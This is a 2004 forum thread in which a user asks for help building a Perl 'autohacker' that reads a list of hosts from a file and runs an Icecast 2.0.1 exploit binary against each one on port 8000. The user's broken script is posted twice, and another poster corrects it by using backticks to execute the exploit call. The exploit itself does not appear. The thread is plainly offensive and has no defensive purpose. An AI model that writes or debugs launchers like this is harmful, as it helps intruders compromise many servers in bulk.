ShouiZen
Oct 3 2004, 05:07 AM
i want create on my cygwin . i want from a list use my exploit but automatically ?
it s possible ??
RedShadow
Oct 3 2004, 06:31 AM
uhh i didnt really understand your post but if you want a auto hacker on nix you could use bsh perl or C
ShouiZen
Oct 3 2004, 04:25 PM
I WANT TO DO IN PERL WHICH FUNCTION i use to read the file (file.txt)? line by line?
ShouiZen
Oct 3 2004, 05:40 PM
i post my script but i thin ther is a error how do you excute the exploits look at my code
#!/usr/bin/perl
use IO::Socket;
print "Icecast 2.0.1\n".
" new exploit autohacker 2004 octobre 2004\n".
" by FX totof\n";
print " Entre le nom de ton fichier";
$file= <STDIN>;
open(TOTO,$file) ¦¦ die ("Erreur d'ouverture $file") ;
while (<TOTO>) {
ex_icecast -h $_ -p 8000;
}
close(TOTO);
or
#!/usr/bin/perl
use IO::Socket;
print "Icecast 2.0.1\n".
" new exploit autohacker 2004 octobre 2004\n".
" by FX totof\n";
print " Entre le nom de ton fichier";
$file= <STDIN>;
open(TOTO,$file) ¦¦ die ("Erreur d'ouverture $file") ;
while (<TOTO>) {
./ex_icecast -h $_ -p 8000; # or that
}
close(TOTO);
help me ??
ShouiZen
Oct 3 2004, 10:53 PM
any idea
lipton
Oct 4 2004, 01:54 AM
try looking up process management on google
ShouiZen
Oct 4 2004, 07:12 PM
thank you man
macman
Oct 6 2004, 01:04 PM
Take it the highlighted bit is the problem...
use backticks
i.e.
whilewhile (<TOTO>) {
`ex_icecast -h $_ -p 8000`
}
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.